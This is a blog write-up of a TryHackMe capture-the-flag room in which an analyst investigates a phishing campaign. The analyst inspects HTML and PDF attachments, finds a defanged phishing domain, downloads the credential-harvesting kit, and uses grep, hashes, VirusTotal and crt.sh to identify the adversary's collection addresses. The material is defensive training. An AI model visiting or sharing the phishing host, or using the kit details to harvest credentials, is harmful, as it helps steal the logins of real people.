Phishing - Snapped Phish-ing Line

Phishing Email, malicious attachment inspection

By Ren Sie
Posted on October 5, 2024

Refer to Snapped Phish-ing Line for the challenge room on TryHackMe

Scenario

As an IT department personnel at SwiftSpend Financial, one of your responsibilities is to assist employees with their technical concerns. While everything seemed routine, the situation changed when several employees from various departments began reporting an unusual email they had received. Unfortunately, some employees had already submitted their credentials and were unable to log in as a result.

Task

We have now begun investigating the situation by:

  • Analyzing the email samples provided by the colleagues.
  • Examining the phishing URL(s) by browsing them using Firefox.
  • Retrieving the phishing kit used by the adversary.
  • Utilizing CTI-related tools to gather more information about the adversary.
  • Analyzing the phishing kit to collect additional details about the adversary.

Who is the individual who received an email attachment containing a PDF?
By reviewing all available emails, we found four .html attachments and one .pdf attachment.

What email address was used by the adversary to send the phishing emails?
After examining all the emails, we found that all the phishing messages originated from the same email address.

What is the redirection URL to the phishing page for the individual Zoe Duncan?
After opening the email to Zoe, I noticed that there was no URL link in the content. It's likely that the link is contained in the attachment. After saving the file to the desktop, we will open it with a text editor instead of directly opening it, as that would not be safe.

~/Desktop$ gedit <attachment file>

Once we view the source code with the text editor, we know the redirect URL.

Note: When a user visits the .html, they will be instantly redirected to the specified URL with the provided email and error parameters

What is the URL to the .zip archive of the phishing kit?
After using the strings and grep commands to search for any 'http' links in the source code, I found an address from the .pdf attachment that matches the one we observed in the .html attachment.

~/Desktop$ strings <attachment> | grep -e 'http'

Based on the previous screenshot, it points to a file named "office365." I removed a couple of directories from the URL, so we will now navigate to the "data" directory instead of downloading the file.

Note: Ensure to use http instead https in the URL.

hxxp[://]kennaroads[.]buzz/data/

After navigating to the address, I found a .zip archive. To obtain the full URL of the archive, right-click on the file and select "Copy link."

What is the SHA256 hash of the phishing kit archive?
To know its hash value, first we need to download it. Then use sha256sum command.

~/Download$ sha256sum <file.zip>

When was the phishing kit archive first submitted?
By "first submitted date," it refers to the date when the file was uploaded to the community for analysis. We can know the date from VirusTotal, simply upload the hash value that we retrieved from the previous question.

When was the SSL certificate the phishing domain used to host the phishing kit archive first logged?
To learn about the SSL certificate for the domain, we can search for it on crt.sh. After performing the search, we will receive a list of the SSL certificate history for the domain, including the first certificate.

Note: crt.sh allows users to search and view details of SSL/TLS certificates from Certificate Transparency logs.

What was the email address of the user who submitted their password twice?
While searching for the .zip archive, I came across with the log.txt file.

Once I opened the file, I identified the user who submitted their credentials twice.

What was the email address used by the adversary to collect compromised credentials?
To find the email address used to collect the credentials, we need to review the toolkit. Once we unzip the file, we'll navigate to its folder.

We will use the grep command to search for any keywords related to the email address.

~/Downloads/Update365/office365$ grep -rni ".com" *

The adversary used other email addresses in the obtained phishing kit. What is the email address that ends in "@gmail.com"?
We will use the grep command to search for the Gmail address contained in the toolkit.

~/Downloads/Update365/office365$ grep -rni "gmail.com" *

What is the hidden flag?
Based on the provided hint, I will add "flag.txt" to the URL in each directory.

Finally, I found another hint in one of the directories. It mentioned that this needs to be decoded in base64 after being input into ChatGPT.

My first attempt at decoding revealed that the order of the characters was incorrect, so I used the rev command to reverse it and successfully retrieved the flag.

Share: X (Twitter) Facebook LinkedIn